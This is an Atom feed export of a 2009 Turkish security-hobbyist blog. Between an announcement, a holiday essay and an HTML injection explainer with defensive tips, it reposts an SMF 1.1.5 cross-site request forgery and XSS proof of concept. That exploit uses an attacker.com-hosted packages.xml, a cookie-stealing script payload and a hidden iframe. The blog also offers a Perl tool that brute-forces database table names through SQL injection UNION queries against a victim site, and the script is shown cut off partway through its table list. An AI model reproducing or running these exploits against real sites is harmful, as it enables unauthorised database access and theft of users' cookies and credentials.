<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-323640432528450619</id><updated>2011-11-27T15:45:01.863-08:00</updated><category term='Security'/><category term='Güncel'/><title type='text'>??</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>10</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-2160464182354434900</id><published>2009-06-30T11:18:00.000-07:00</published><updated>2009-06-30T11:22:15.264-07:00</updated><title type='text'>En Sonunda</title><content type='html'>1 Temmuzda Açıcağıum Blog&lt;br /&gt;&lt;br /&gt;Net-Frozen.TurkBlog.Com BekleyiN :d&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-2160464182354434900?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/2160464182354434900/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/06/en-sonunda.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/2160464182354434900'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/2160464182354434900'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/06/en-sonunda.html' title='En Sonunda'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-364461764229727718</id><published>2009-05-21T05:56:00.000-07:00</published><updated>2009-05-22T12:54:39.316-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>SMF 1.1.5 [ Bug ]</title><content type='html'>Author: Xianur0&lt;br /&gt;Vulnerable Version: All&lt;br /&gt;&lt;br /&gt;The Bug is located in the file: Sources/PackageGet.php&lt;br /&gt;&lt;br /&gt;Örnek :&lt;br /&gt;&lt;br /&gt;&lt;a class="external" target="_blank" href="http://victm.com/index.php?action=pa...//attacker.com"&gt;http://victm.com/index.php?action=pa...//attacker.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;When the admin link between the SMF to load the file:&lt;br /&gt;&lt;br /&gt;&lt;a class="external" target="_blank" href="http://attacker.com/packages.xml"&gt;http://attacker.com/packages.xml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Save this file as packages.xml&lt;br /&gt;&lt;br /&gt;&lt; ?xml version="1.0"? &gt;&lt;br /&gt;&lt; !DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list" &gt;&lt;br /&gt;&lt;!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - XSRF SMF PoC By XianurO - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - --&gt;&lt;br /&gt;&lt;br /&gt;&lt; xmlns="http://www.simplemachines.org/xml/package-list" smf="http://www.simplemachines.org/"&gt;&lt;br /&gt;&lt;list-title&gt; deneme Was Here&lt;/list-title&gt;&lt;br /&gt;&lt;br /&gt;&lt;section&gt;&lt;br /&gt;&lt;title&gt;SMF XSS PoC By Xianur0&lt;/title&gt;&lt;br /&gt;&lt;text&gt;&lt;!--[CDATA[&lt;script&gt;alert(&amp;#8217;XSS&amp;#8217;)&lt;/script&gt;]]--&gt;&lt;/text&gt;&lt;br /&gt;&lt;modification&gt;&lt;br /&gt;&lt;id&gt;Xianur0:XSMF&lt;/id&gt;&lt;br /&gt;&lt;name&gt;SMF PoC By Xianur0&lt;/name&gt;&lt;br /&gt;&lt;filename&gt;smfexploit.zip&lt;/filename&gt;&lt;br /&gt;&lt;version&gt;0.1&lt;/version&gt;&lt;br /&gt;&lt;author email=""&gt;Xianur0&lt;/author&gt;&lt;br /&gt;&lt;description&gt; &lt;!--[CDATA[&lt;script&gt;alert(document.cookie)&lt;/script&gt;]]--&gt;&lt;/description&gt;&lt;br /&gt;&lt;/modification&gt;&lt;br /&gt;&lt;/section&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;and generate the XSRF:&lt;br /&gt;&lt;br /&gt;&lt; iframe src="http://victim.com/index.php?action=packageget;sa=browse;absolute=htt%20p://attacker.com" scrolling="no" width="0%"&gt;&lt;/iframe &gt;&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-01-26]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-364461764229727718?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/364461764229727718/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/author-xianur0-vulnerable-version-all.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/364461764229727718'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/364461764229727718'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/author-xianur0-vulnerable-version-all.html' title='SMF 1.1.5 [ Bug ]'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-8880223390640214773</id><published>2009-05-21T05:50:00.000-07:00</published><updated>2009-05-21T05:56:28.954-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Html İnjection</title><content type='html'>&lt;strong&gt;&lt;span style="color: rgb(78, 154, 6);"&gt;Html'de İnjection olmaz diyenler buyrun. Bi Mspx'de Sql bulamadım onu da keşfederim yakında&lt;br /&gt;&lt;br /&gt;Evet blogsever arkadaşlar bu anlatımımda “html injection” güvenlik açığı hakkında bilgilendirme yapıp, bu açıktan korunmak için ipuçları vereceğim.&lt;br /&gt;&lt;br /&gt;Bu güvenlik açığı; web yazılımlarında programcıların güvenlik konusundaki bilgisizliğinden veya dikkatsizliğinden kaynaklanmaktadır. Genellikle ziyaretçilerin veritabanına bilgi girişinde bulunması ve bu bilginin daha sonra site üzerinde çağırılmasıyla oluşur. Ziyaretçi yorumlarının olduğu kısımlarda, ziyaretçilerin profil bilgilerini girdiği kısımlarda giriş yapılan veriyi kontrol ettirmeden direkt olarak veritabanına alınmasından dolayı meydana gelir.&lt;br /&gt;&lt;br /&gt;Örnekle açıklamak gerekirse diyelim ki bir web sitesinde saldırgan bir makaleye yorum yapıyor. Yorum yerine içerisinde yönlendirme yapmaya yarayan bir meta tagı kullanıyor. Eğer bu girilen veri direkt olarak veritabanına aktarılıyorsa, ziyaretçilerin o yorumun çağrıldığı sayfaya girmesiyle site, saldırganın yönlendirdiği site veya sayfaya yönleniyor. Günümüzde yönlenerek açılan hack sayfaları bu açıktan yararlanılarak yapılmaktadır.&lt;br /&gt;&lt;br /&gt;Gelelim nasıl korunacağımıza. En basit korunma yöntemi aslında veriyi siteye çağırırken değilde veritabanına girmeden önce bazı filtrelerden geçirip kaydetmektir. Php dilinde bunun en basit yolu veriyi kaydetmeden önce strip_tags() fonksiyonundan geçirmektir. strip_tags() fonksiyonu veriyi html taglarından arındırır.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img7.imageshack.us/img7/6469/14889882.jpg" alt="" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;Bunun gibi fonksiyonlar kullanıp güvenliği arttırmanın yanında sizde kendinize göre güvenlik fonksiyonları üretebilirsiniz. Veya html destekli editör kullanmak istiyorsunuz fakat bazı kodların girilmesini engellemek istiyorsunuz. Bunun içinde kendi yazdığınız fonksiyonları kullanabilirsiniz. Str_replace() fonksiyonu ile gelen bazı değerleri sizin uyarladığınız default değerlere dönüştürebilirsiniz. Güvenlik çok büyük bir kavram ve ne yazık ki sadece bu gösterdiğim kodla güvenliği tamamen sağlamış olmuyorsunuz sadece html injection ataklarına karşı bir önlem almış oluyorsunuz.&lt;br /&gt;&lt;br /&gt;İyi Çalışmalar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Selametle..&lt;/span&gt;   &lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-8880223390640214773?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/8880223390640214773/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/html-injection.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/8880223390640214773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/8880223390640214773'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/html-injection.html' title='Html İnjection'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-8225907106166713872</id><published>2009-05-19T05:42:00.000-07:00</published><updated>2009-05-21T05:48:53.647-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Güncel'/><title type='text'>19 Mayıs Gençlik ve Spor Bayramı</title><content type='html'>&lt;p&gt;&lt;strong&gt;Tarih 16 Mayıs 1919..Gözlerini para,hırs bürümüş düşman yığını zamanın efsane gemileriyle boğazdan geçiş yapıyor.Bunu gören Mustafa Kemal unutulmaz vecizelerinden birini söylüyor: ” Geldiğiniz gibi gideceksiniz! ” Milli mücadelenin bir an önce başlaması gerektiğini düşünen Mustafa Kemal 19Mayıs 1919 günü Samsun’a çıktı.Kongreler,bildiriler yoluyla halkı düşman devletlere karşı bilinçlendiren,kuvay-i milliye ruhunu ortaya çıkaran paşa, yaptığı işi meşrulaştırmak amacıyla önemli komutanların desteğini aldı.Yokluk içinde eldeki imkanlar dahilinde vatanı savunan,bağımsızlığını kaybetmeyi onursuzluk olarak nitelendiren bir milleti devletsiz bırakmamak için TÜRKİYE CUMHURİYETİ’ni kuran Gazi Mustafa Kemal ne yazıkki kendinden sonra gelen kişilerin devlet çıkarları yerine kendi çıkarları doğrultusunda hareket edeceklerini hesap edememişti.Cumhuriyetçilik,laiklik,milliyetcilik ilkelerini ortaya koyan,son derece de güzel uygulanan yasalar zaman içinde değiştirildi.Mustafa Kemal’in izleri silinmeye çalışıldı ve halada çalışılıyor. Milli Mücadelenin başlangıç tarihi olarak kabul edilen&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt; 19Mayısı gençlere armağan eden Mustafa Kemal’i saygı ve rahmetle anıyor,gençlerimizin bayramını kutluyoruz.&lt;/strong&gt;&lt;/p&gt; &lt;strong&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;em&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;Yazar&lt;/span&gt; “Mustafa Albayrak”&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-8225907106166713872?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/8225907106166713872/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/19-mays-genclik-ve-spor-bayram.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/8225907106166713872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/8225907106166713872'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/19-mays-genclik-ve-spor-bayram.html' title='19 Mayıs Gençlik ve Spor Bayramı'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-2258463730332689186</id><published>2009-05-18T08:57:00.001-07:00</published><updated>2009-05-21T05:48:44.771-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Sql İnjection Php And Asp Tablo Bulucu [ Perl ]</title><content type='html'>&lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Selamun Aleykum Arkadaslar...&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Son zamanların modası olan sql de size büyük bir kolaylık sağlıyacak perl exploiti vereceğim...&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;örneğin bir sitede sql injection hatası buldunuz tablo adını tahmin edemiyorsunuz ya da uğrasmak istemiyorsunuz bu exploit tam size göre... fazla uzatmadan kodları vereyim...&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Exploiti perlde çalıstırabilirsiniz... Konu Hakkında sorusu olan konu altından belirtsin..&lt;/span&gt;&lt;/p&gt;&lt;strong&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#!/usr/bin/perl&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;&lt;br /&gt;print "#########################################################\n";&lt;br /&gt;print "#                    [Revenge Attack]                   #\n";&lt;br /&gt;print "#          Türkcelestirme By nétReaL~ From RAT #\n";&lt;br /&gt;print "#               Asp Ve Php Tablo scanner v1.0           #\n";&lt;br /&gt;print "#               www.kacaq.blogspot.com                  #\n";&lt;br /&gt;print "#                    Kaco Aga                           #\n";&lt;br /&gt;print "#                  Code Started...                      #\n";&lt;br /&gt;print "#########################################################\n";&lt;br /&gt;print "\n";&lt;br /&gt;&lt;br /&gt;print "Menu:\n";&lt;br /&gt;print "\n";&lt;br /&gt;&lt;br /&gt;print "1. PHP SQL İNJ TABLO\n";&lt;br /&gt;print "2. ASP SQL İNJ TABLO\n";&lt;br /&gt;print "\n";&lt;br /&gt;print "Opcao: ";&lt;br /&gt;$opcao=&lt;stdin&gt;;&lt;br /&gt;&lt;br /&gt;if ($opcao==1)&lt;br /&gt;{&lt;br /&gt;&amp;amp;PHP&lt;br /&gt;}&lt;br /&gt;if ($opcao==2)&lt;br /&gt;{&lt;br /&gt;&amp;amp;ASP&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub PHP&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;print "Sql Taranacak siteyi yazin:\n";&lt;br /&gt;print "Ex: http://www.siteismi.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9\n\n";&lt;br /&gt;chomp($site = &lt;stdin&gt;);&lt;br /&gt;&lt;br /&gt;if($site !~ /http:\/\//) { $site = "http://$site"; }&lt;br /&gt;&lt;br /&gt;@tab= ('+from+usuarios',&lt;br /&gt;'+from+usuario',&lt;br /&gt;'+from+users',&lt;br /&gt;'+from+user',&lt;br /&gt;'+from+login',&lt;br /&gt;'+from+admin',&lt;br /&gt;'+from+tbusuarios',&lt;br /&gt;'+from+tbusuario',&lt;br /&gt;'+from+tbusers',&lt;br /&gt;'+from+tbuser',&lt;br /&gt;'+from+tblogin',&lt;br /&gt;'+from+tbadmin',&lt;br /&gt;'+from+tblusuarios',&lt;br /&gt;'+from+tblusuario',&lt;br /&gt;'+from+tblusers',&lt;br /&gt;'+from+tbluser',&lt;br /&gt;'+from+tbllogin',&lt;br /&gt;'+from+tbladmin',&lt;br /&gt;'+from+tb_usuarios',&lt;br /&gt;'+from+tb_usuario',&lt;br /&gt;'+from+tb_users',&lt;br /&gt;'+from+tb_user',&lt;br /&gt;'+from+tb_login',&lt;br /&gt;'+from+tb_admin',&lt;br /&gt;'+from+tbl_usuarios',&lt;br /&gt;'+from+tbl_usuario',&lt;br /&gt;'+from+tbl_users',&lt;br /&gt;'+from+tbl_user',&lt;br /&gt;'+from+tbl_login',&lt;br /&gt;'+from+tbl_admin',&lt;br /&gt;'+from+tblUsers',&lt;br /&gt;'+from+tblAdmin',&lt;br /&gt;'+from+username',&lt;br /&gt;'+from+usernames',&lt;br /&gt;'+from+name',&lt;br /&gt;'+from+names',&lt;br /&gt;'+from+nombre',&lt;br /&gt;'+from+nombres',&lt;br /&gt;'+from+member',&lt;br /&gt;'+from+members',&lt;br /&gt;'+from+admin_table',&lt;br /&gt;'+from+miembro',&lt;br /&gt;'+from+miembros',&lt;br /&gt;'+from+membername',&lt;br /&gt;'+from+admins',&lt;br /&gt;'+from+administrator',&lt;br /&gt;'+from+administrators',&lt;br /&gt;'+from+passwd',&lt;br /&gt;'+from+password',&lt;br /&gt;'+from+passwords',&lt;br /&gt;'+from+pass',&lt;br /&gt;'+from+Pass',&lt;br /&gt;'+from+tAdmin',&lt;br /&gt;'+from+tadmin',&lt;br /&gt;'+from+user_password',&lt;br /&gt;'+from+user_passwords',&lt;br /&gt;'+from+user_name',&lt;br /&gt;'+from+user_names',&lt;br /&gt;'+from+member_password',&lt;br /&gt;'+from+mods',&lt;br /&gt;'+from+mod',&lt;br /&gt;'+from+moderators',&lt;br /&gt;'+from+moderator',&lt;br /&gt;'+from+user_email',&lt;br /&gt;'+from+user_emails',&lt;br /&gt;'+from+user_mail',&lt;br /&gt;'+from+user_mails',&lt;br /&gt;'+from+mail',&lt;br /&gt;'+from+emails',&lt;br /&gt;'+from+email',&lt;br /&gt;'+from+address',&lt;br /&gt;'+from+e-mail',&lt;br /&gt;'+from+emailaddress',&lt;br /&gt;'+from+correo',&lt;br /&gt;'+from+correos',&lt;br /&gt;'+from+phpbb_users',&lt;br /&gt;'+from+log',&lt;br /&gt;'+from+logins',&lt;br /&gt;'+from+login',&lt;br /&gt;'+from+registers',&lt;br /&gt;'+from+register',&lt;br /&gt;'+from+usr',&lt;br /&gt;'+from+usrs',&lt;br /&gt;'+from+ps',&lt;br /&gt;'+from+pw',&lt;br /&gt;'+from+un',&lt;br /&gt;'+from+u_name',&lt;br /&gt;'+from+u_pass',&lt;br /&gt;'+from+tpassword',&lt;br /&gt;'+from+tPassword',&lt;br /&gt;'+from+u_password',&lt;br /&gt;'+from+nick',&lt;br /&gt;'+from+nicks',&lt;br /&gt;'+from+manager',&lt;br /&gt;'+from+managers',&lt;br /&gt;'+from+administrador',&lt;br /&gt;'+from+tUser',&lt;br /&gt;'+from+tUsers',&lt;br /&gt;'+from+administradores',&lt;br /&gt;'+from+clave',&lt;br /&gt;'+from+login_id',&lt;br /&gt;'+from+pwd',&lt;br /&gt;'+from+pas',&lt;br /&gt;'+from+sistema_id',&lt;br /&gt;'+from+sistema_usuario',&lt;br /&gt;'+from+sistema_password',&lt;br /&gt;'+from+contrasena',&lt;br /&gt;'+from+auth',&lt;br /&gt;'+from+key',&lt;br /&gt;'+from+senha',&lt;br /&gt;'+from+tb_administrator',&lt;br /&gt;'+from+tb_logon',&lt;br /&gt;'+from+tb_members_tb_member',&lt;br /&gt;'+from+tb_userstb_user',&lt;br /&gt;'+from+tb_sys',&lt;br /&gt;'+from+sys',&lt;br /&gt;'+from+fazerlogon',&lt;br /&gt;'+from+logon',&lt;br /&gt;'+from+fazer',&lt;br /&gt;'+from+uthorization',&lt;br /&gt;'+from+membros',&lt;br /&gt;'+from+utilizadores',&lt;br /&gt;'+from+staff',&lt;br /&gt;'+from+nuke_authors',&lt;br /&gt;'+from+accounts',&lt;br /&gt;'+from+account',&lt;br /&gt;'+from+accnts',&lt;br /&gt;'+from+associated',&lt;br /&gt;'+from+accnt',&lt;br /&gt;'+from+customers',&lt;br /&gt;'+from+customer',&lt;br /&gt;'+from+membres',&lt;br /&gt;'+from+administrateur',&lt;br /&gt;'+from+utilisateur',&lt;br /&gt;'+from+tusertusers',&lt;br /&gt;'+from+utilisateurs',&lt;br /&gt;'+from+password',&lt;br /&gt;'+from+amministratore',&lt;br /&gt;'+from+god',&lt;br /&gt;'+from+God',&lt;br /&gt;'+from+authors',&lt;br /&gt;'+from+asociado',&lt;br /&gt;'+from+asociados',&lt;br /&gt;'+from+autores',&lt;br /&gt;'+from+membername',&lt;br /&gt;'+from+autor',&lt;br /&gt;'+from+autores',&lt;br /&gt;'+from+Users',&lt;br /&gt;'+from+Admin',&lt;br /&gt;'+from+Members',&lt;br /&gt;'+from+Miembros',&lt;br /&gt;'+from+Usuario',&lt;br /&gt;'+from+Usuarios',&lt;br /&gt;'+from+ADMIN',&lt;br /&gt;'+from+USERS',&lt;br /&gt;'+from+USER',&lt;br /&gt;'+from+MEMBER',&lt;br /&gt;'+from+MEMBERS',&lt;br /&gt;'+from+USUARIO',&lt;br /&gt;'+from+USUARIOS',&lt;br /&gt;'+from+MIEMBROS',&lt;br /&gt;'+from+MIEMBRO');&lt;br /&gt;&lt;br /&gt;print "\Tablolar araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";&lt;br /&gt;&lt;br /&gt;foreach $scan(@tab){&lt;br /&gt;&lt;br /&gt;my $url = $site.$scan;&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new();&lt;br /&gt;my $req = HTTP::Request-&gt;new(GET=&gt;$url);&lt;br /&gt;my $resultado = $ua-&gt;request($req);&lt;br /&gt;&lt;br /&gt;if ($resultado-&gt;content !~ /doesn't exist/ &amp;amp;&amp;amp; $resultado-&gt;content !~ /You have an error in your SQL syntax./)&lt;br /&gt;{&lt;br /&gt;print "$url\n";&lt;br /&gt;open(a, "&gt;&gt;Union_PHP.txt");&lt;br /&gt;print a "$url\n";&lt;br /&gt;close(a);&lt;br /&gt;}}&lt;br /&gt;print "\bulunan tablolar masaustune  Union_PHP.txt olarak kaydedildi.\n";&lt;br /&gt;print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";&lt;br /&gt;&lt;stdin&gt;;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub ASP&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;print "Sql Taranacak siteyi yazin:\n";&lt;br /&gt;print "Ex: http://www.siteismi.com/default.asp?id=99\n\n";&lt;br /&gt;chomp($site = &lt;stdin&gt;);&lt;br /&gt;&lt;br /&gt;if($site !~ /http:\/\//) { $site = "http://$site"; }&lt;br /&gt;&lt;br /&gt;@tab= ('+union+select+0+from+usuarios',&lt;br /&gt;'+union+select+0+from+usuario',&lt;br /&gt;'+union+select+0+from+users',&lt;br /&gt;'+union+select+0+from+user',&lt;br /&gt;'+union+select+0+from+login',&lt;br /&gt;'+union+select+0+from+admin',&lt;br /&gt;'+union+select+0+from+tbusuarios',&lt;br /&gt;'+union+select+0+from+tbusuario',&lt;br /&gt;'+union+select+0+from+tbusers',&lt;br /&gt;'+union+select+0+from+tbuser',&lt;br /&gt;'+union+select+0+from+tblogin',&lt;br /&gt;'+union+select+0+from+tbadmin',&lt;br /&gt;'+union+select+0+from+tblusuarios',&lt;br /&gt;'+union+select+0+from+tblusuario',&lt;br /&gt;'+union+select+0+from+tblusers',&lt;br /&gt;'+union+select+0+from+tbluser',&lt;br /&gt;'+union+select+0+from+tbllogin',&lt;br /&gt;'+union+select+0+from+tbladmin',&lt;br /&gt;'+union+select+0+from+tb_usuarios',&lt;br /&gt;'+union+select+0+from+tb_usuario',&lt;br /&gt;'+union+select+0+from+tb_users',&lt;br /&gt;'+union+select+0+from+tb_user',&lt;br /&gt;'+union+select+0+from+tb_login',&lt;br /&gt;'+union+select+0+from+tb_admin',&lt;br /&gt;'+union+select+0+from+tbl_usuarios',&lt;br /&gt;'+union+select+0+from+tbl_usuario',&lt;br /&gt;'+union+select+0+from+tbl_users',&lt;br /&gt;'+union+select+0+from+tbl_user',&lt;br /&gt;'+union+select+0+from+tbl_login',&lt;br /&gt;'+union+select+0+from+tbl_admin',&lt;br /&gt;'+union+select+0+from+tblUsers',&lt;br /&gt;'+union+select+0+from+tblAdmin',&lt;br /&gt;'+union+select+0+from+username',&lt;br /&gt;'+union+select+0+from+usernames',&lt;br /&gt;'+union+select+0+from+name',&lt;br /&gt;'+union+select+0+from+names',&lt;br /&gt;'+union+select+0+from+nombre',&lt;br /&gt;'+union+select+0+from+nombres',&lt;br /&gt;'+union+select+0+from+member',&lt;br /&gt;'+union+select+0+from+members',&lt;br /&gt;'+union+select+0+from+admin_table',&lt;br /&gt;'+union+select+0+from+miembro',&lt;br /&gt;'+union+select+0+from+miembros',&lt;br /&gt;'+union+select+0+from+membername',&lt;br /&gt;'+union+select+0+from+admins',&lt;br /&gt;'+union+select+0+from+administrator',&lt;br /&gt;'+union+select+0+from+administrators',&lt;br /&gt;'+union+select+0+from+passwd',&lt;br /&gt;'+union+select+0+from+password',&lt;br /&gt;'+union+select+0+from+passwords',&lt;br /&gt;'+union+select+0+from+pass',&lt;br /&gt;'+union+select+0+from+Pass',&lt;br /&gt;'+union+select+0+from+tAdmin',&lt;br /&gt;'+union+select+0+from+tadmin',&lt;br /&gt;'+union+select+0+from+user_password',&lt;br /&gt;'+union+select+0+from+user_passwords',&lt;br /&gt;'+union+select+0+from+user_name',&lt;br /&gt;'+union+select+0+from+user_names',&lt;br /&gt;'+union+select+0+from+member_password',&lt;br /&gt;'+union+select+0+from+mods',&lt;br /&gt;'+union+select+0+from+mod',&lt;br /&gt;'+union+select+0+from+moderators',&lt;br /&gt;'+union+select+0+from+moderator',&lt;br /&gt;'+union+select+0+from+user_email',&lt;br /&gt;'+union+select+0+from+user_emails',&lt;br /&gt;'+union+select+0+from+user_mail',&lt;br /&gt;'+union+select+0+from+user_mails',&lt;br /&gt;'+union+select+0+from+mail',&lt;br /&gt;'+union+select+0+from+emails',&lt;br /&gt;'+union+select+0+from+email',&lt;br /&gt;'+union+select+0+from+address',&lt;br /&gt;'+union+select+0+from+e-mail',&lt;br /&gt;'+union+select+0+from+emailaddress',&lt;br /&gt;'+union+select+0+from+correo',&lt;br /&gt;'+union+select+0+from+correos',&lt;br /&gt;'+union+select+0+from+phpbb_users',&lt;br /&gt;'+union+select+0+from+log',&lt;br /&gt;'+union+select+0+from+logins',&lt;br /&gt;'+union+select+0+from+login',&lt;br /&gt;'+union+select+0+from+registers',&lt;br /&gt;'+union+select+0+from+register',&lt;br /&gt;'+union+select+0+from+usr',&lt;br /&gt;'+union+select+0+from+usrs',&lt;br /&gt;'+union+select+0+from+ps',&lt;br /&gt;'+union+select+0+from+pw',&lt;br /&gt;'+union+select+0+from+un',&lt;br /&gt;'+union+select+0+from+u_name',&lt;br /&gt;'+union+select+0+from+u_pass',&lt;br /&gt;'+union+select+0+from+tpassword',&lt;br /&gt;'+union+select+0+from+tPassword',&lt;br /&gt;'+union+select+0+from+u_password',&lt;br /&gt;'+union+select+0+from+nick',&lt;br /&gt;'+union+select+0+from+nicks',&lt;br /&gt;'+union+select+0+from+manager',&lt;br /&gt;'+union+select+0+from+managers',&lt;br /&gt;'+union+select+0+from+administrador',&lt;br /&gt;'+union+select+0+from+tUser',&lt;br /&gt;'+union+select+0+from+tUsers',&lt;br /&gt;'+union+select+0+from+administradores',&lt;br /&gt;'+union+select+0+from+clave',&lt;br /&gt;'+union+select+0+from+login_id',&lt;br /&gt;'+union+select+0+from+pwd',&lt;br /&gt;'+union+select+0+from+pas',&lt;br /&gt;'+union+select+0+from+sistema_id',&lt;br /&gt;'+union+select+0+from+sistema_usuario',&lt;br /&gt;'+union+select+0+from+sistema_password',&lt;br /&gt;'+union+select+0+from+contrasena',&lt;br /&gt;'+union+select+0+from+auth',&lt;br /&gt;'+union+select+0+from+key',&lt;br /&gt;'+union+select+0+from+senha',&lt;br /&gt;'+union+select+0+from+tb_administrator',&lt;br /&gt;'+union+select+0+from+tb_logon',&lt;br /&gt;'+union+select+0+from+tb_members_tb_member',&lt;br /&gt;'+union+select+0+from+tb_userstb_user',&lt;br /&gt;'+union+select+0+from+tb_sys',&lt;br /&gt;'+union+select+0+from+sys',&lt;br /&gt;'+union+select+0+from+fazerlogon',&lt;br /&gt;'+union+select+0+from+logon',&lt;br /&gt;'+union+select+0+from+fazer',&lt;br 